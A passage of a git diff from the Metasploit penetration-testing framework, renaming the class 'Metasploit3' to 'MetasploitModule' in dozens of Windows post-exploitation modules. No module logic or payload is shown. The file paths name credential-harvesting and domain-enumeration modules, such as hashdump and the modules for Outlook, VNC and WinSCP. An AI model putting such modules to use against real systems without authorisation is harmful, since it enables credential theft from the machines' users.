Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb index f1d00c5d0b..32bd184558 100644 --- a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb +++ b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb @@ -9,7 +9,7 @@ require 'msf/core/auxiliary/report' require 'msf/core/post/windows/mssql' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::MSSQL diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index f42fa10637..61ee3a02e8 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index bca5db7416..2b7f673fc4 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb index 9d5d445164..591cb8b158 100644 --- a/modules/post/windows/gather/credentials/razer_synapse.rb +++ b/modules/post/windows/gather/credentials/razer_synapse.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb index a01bb9b7b8..15904682b1 100644 --- a/modules/post/windows/gather/credentials/razorsql.rb +++ b/modules/post/windows/gather/credentials/razorsql.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/rdc_manager_creds.rb b/modules/post/windows/gather/credentials/rdc_manager_creds.rb index 45f0e8ed0d..dcb6c71378 100644 --- a/modules/post/windows/gather/credentials/rdc_manager_creds.rb +++ b/modules/post/windows/gather/credentials/rdc_manager_creds.rb @@ -10,7 +10,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/skype.rb b/modules/post/windows/gather/credentials/skype.rb index f950de44e5..208f0e5351 100644 --- a/modules/post/windows/gather/credentials/skype.rb +++ b/modules/post/windows/gather/credentials/skype.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb index cb0fce4d6e..402e30f37b 100644 --- a/modules/post/windows/gather/credentials/smartermail.rb +++ b/modules/post/windows/gather/credentials/smartermail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb index 1fa9bba41f..be08299ad5 100644 --- a/modules/post/windows/gather/credentials/smartftp.rb +++ b/modules/post/windows/gather/credentials/smartftp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index c3461846d4..56df968c5f 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb index d2584ecf2c..0225b853bc 100644 --- a/modules/post/windows/gather/credentials/sso.rb +++ b/modules/post/windows/gather/credentials/sso.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/priv' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb index f17abf7c5c..2db1ce9589 100644 --- a/modules/post/windows/gather/credentials/steam.rb +++ b/modules/post/windows/gather/credentials/steam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index 731d3da103..27ebffe316 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index 1f51aabd04..51e71c843d 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/trillian.rb b/modules/post/windows/gather/credentials/trillian.rb index a80e9bef9e..1d4b76bfeb 100644 --- a/modules/post/windows/gather/credentials/trillian.rb +++ b/modules/post/windows/gather/credentials/trillian.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 0442f20835..5229692c3a 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rex/proto/rfb' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 5af3bdb12d..ea3ebf955c 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index e9c4d452d1..3cc7a3dcd8 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'rex/parser/winscp' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb index 1227e572e2..fafdd63add 100644 --- a/modules/post/windows/gather/credentials/wsftp_client.rb +++ b/modules/post/windows/gather/credentials/wsftp_client.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/dnscache_dump.rb b/modules/post/windows/gather/dnscache_dump.rb index de4bf2fefb..b496b0d2cd 100644 --- a/modules/post/windows/gather/dnscache_dump.rb +++ b/modules/post/windows/gather/dnscache_dump.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index 13d701aac1..58843c819b 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb index 2801d749ab..6c005e5342 100644 --- a/modules/post/windows/gather/enum_ad_bitlocker.rb +++ b/modules/post/windows/gather/enum_ad_bitlocker.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 27f3a742c3..0f395c1e53 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_groups.rb b/modules/post/windows/gather/enum_ad_groups.rb index ade732c27a..2db5affb9a 100644 --- a/modules/post/windows/gather/enum_ad_groups.rb +++ b/modules/post/windows/gather/enum_ad_groups.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP # include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ad_managedby_groups.rb b/modules/post/windows/gather/enum_ad_managedby_groups.rb index 72959f6086..19644021fb 100644 --- a/modules/post/windows/gather/enum_ad_managedby_groups.rb +++ b/modules/post/windows/gather/enum_ad_managedby_groups.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_service_principal_names.rb b/modules/post/windows/gather/enum_ad_service_principal_names.rb index 125c9feb59..c6a4badebb 100644 --- a/modules/post/windows/gather/enum_ad_service_principal_names.rb +++ b/modules/post/windows/gather/enum_ad_service_principal_names.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_to_wordlist.rb b/modules/post/windows/gather/enum_ad_to_wordlist.rb index 33f37b1bcf..6da00f76ad 100644 --- a/modules/post/windows/gather/enum_ad_to_wordlist.rb +++ b/modules/post/windows/gather/enum_ad_to_wordlist.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_user_comments.rb b/modules/post/windows/gather/enum_ad_user_comments.rb index 22519eae57..d6759fb211 100644 --- a/modules/post/windows/gather/enum_ad_user_comments.rb +++ b/modules/post/windows/gather/enum_ad_user_comments.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb index 2fc5ed7779..87adb8193d 100644 --- a/modules/post/windows/gather/enum_ad_users.rb +++ b/modules/post/windows/gather/enum_ad_users.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index b3b2a25bab..a368256941 100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb index 2247ea9dc1..f07817d3c8 100644 --- a/modules/post/windows/gather/enum_artifacts.rb +++ b/modules/post/windows/gather/enum_artifacts.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/enum_av_excluded.rb b/modules/post/windows/gather/enum_av_excluded.rb index 0aa167b783..3d04c4fb31 100644 --- a/modules/post/windows/gather/enum_av_excluded.rb +++ b/modules/post/windows/gather/enum_av_excluded.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry def initialize(info = {}) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index f1af882553..3ccb2882d0 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_computers.rb b/modules/post/windows/gather/enum_computers.rb index 8ecc9ee524..bd66af39ba 100644 --- a/modules/post/windows/gather/enum_computers.rb +++ b/modules/post/windows/gather/enum_computers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 27ff05d2ed..9a028e9058 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_devices.rb b/modules/post/windows/gather/enum_devices.rb index 9829aa63e8..218cf88701 100644 --- a/modules/post/windows/gather/enum_devices.rb +++ b/modules/post/windows/gather/enum_devices.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index c772da1822..f92c1f433b 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_domain.rb b/modules/post/windows/gather/enum_domain.rb index 6d1c252834..5e0c8a0832 100644 --- a/modules/post/windows/gather/enum_domain.rb +++ b/modules/post/windows/gather/enum_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_domain_group_users.rb b/modules/post/windows/gather/enum_domain_group_users.rb index f9c2f877a3..5d0f6a1414 100644 --- a/modules/post/windows/gather/enum_domain_group_users.rb +++ b/modules/post/windows/gather/enum_domain_group_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Gather Enumerate Domain Group', diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb index c917d0be8d..a2808ec180 100644 --- a/modules/post/windows/gather/enum_domain_tokens.rb +++ b/modules/post/windows/gather/enum_domain_tokens.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index 2ebfbb3208..11077706ad 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -4,7 +4,7 @@ require 'msf/core/post/common' require 'msf/core/post/windows/registry' require 'msf/core/post/windows/netapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index 28dc44c576..01cbeb914e 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/netapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::NetAPI diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb index 3b28a296ed..46215718fe 100644 --- a/modules/post/windows/gather/enum_files.rb +++ b/modules/post/windows/gather/enum_files.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_hostfile.rb b/modules/post/windows/gather/enum_hostfile.rb index 9f2d188091..3053a9d4a9 100644 --- a/modules/post/windows/gather/enum_hostfile.rb +++ b/modules/post/windows/gather/enum_hostfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/enum_ie.rb b/modules/post/windows/gather/enum_ie.rb index 846df38f16..85d9d7d0c3 100644 --- a/modules/post/windows/gather/enum_ie.rb +++ b/modules/post/windows/gather/enum_ie.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_logged_on_users.rb b/modules/post/windows/gather/enum_logged_on_users.rb index fc5958c96c..702b5d3e1c 100644 --- a/modules/post/windows/gather/enum_logged_on_users.rb +++ b/modules/post/windows/gather/enum_logged_on_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index ae2d0bc3a6..f833df4511 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 4644a8823a..425095613b 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'rex/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_patches.rb b/modules/post/windows/gather/enum_patches.rb index a6c4162dfd..2940456b5c 100644 --- a/modules/post/windows/gather/enum_patches.rb +++ b/modules/post/windows/gather/enum_patches.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/windows/extapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index 41ca9b2119..4a61411ee9 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index f6edb22bf1..328855c968 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index bb98d36e77..eec20ad528 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Post::Windows::Services diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb index 00d38c0806..8d06f9d8f2 100644 --- a/modules/post/windows/gather/enum_putty_saved_sessions.rb +++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::File diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index eff601943b..45423beb71 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Services diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index b0dfe05714..c3e144e7f5 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_snmp.rb b/modules/post/windows/gather/enum_snmp.rb index 9316605288..b35a01b0d6 100644 --- a/modules/post/windows/gather/enum_snmp.rb +++ b/modules/post/windows/gather/enum_snmp.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index 2ad65c80e2..96369e9065 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index 4a7838d3cd..18ba14ec9d 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_tomcat.rb b/modules/post/windows/gather/enum_tomcat.rb index 2f98e036c6..3039d588e9 100644 --- a/modules/post/windows/gather/enum_tomcat.rb +++ b/modules/post/windows/gather/enum_tomcat.rb @@ -8,7 +8,7 @@ require 'rexml/document' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 09dea61737..348e8886f9 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/parser/unattend' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/file_from_raw_ntfs.rb b/modules/post/windows/gather/file_from_raw_ntfs.rb index 2500d9226f..d48f1f77ef 100644 --- a/modules/post/windows/gather/file_from_raw_ntfs.rb +++ b/modules/post/windows/gather/file_from_raw_ntfs.rb @@ -5,7 +5,7 @@ require 'rex/parser/fs/ntfs' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error diff --git a/modules/post/windows/gather/forensics/browser_history.rb b/modules/post/windows/gather/forensics/browser_history.rb index 161789429b..fc8f75b4d1 100644 --- a/modules/post/windows/gather/forensics/browser_history.rb +++ b/modules/post/windows/gather/forensics/browser_history.rb @@ -10,7 +10,7 @@ require 'msf/core/post/windows/user_profiles' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/forensics/duqu_check.rb b/modules/post/windows/gather/forensics/duqu_check.rb index c967b5f6ab..95db9869cf 100644 --- a/modules/post/windows/gather/forensics/duqu_check.rb +++ b/modules/post/windows/gather/forensics/duqu_check.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index 34b24c51cb..a1bc92dd3b 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -11,7 +11,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index 209a90c492..9245efeb0d 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -14,7 +14,7 @@ require 'digest/md5' require 'digest/sha1' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index 2a029ce6a3..fe5704295f 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -14,7 +14,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/recovery_files.rb b/modules/post/windows/gather/forensics/recovery_files.rb index c32cfa7420..bae7105eee 100644 --- a/modules/post/windows/gather/forensics/recovery_files.rb +++ b/modules/post/windows/gather/forensics/recovery_files.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index 0f4b866d16..2e635e04b2 100644 --- a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 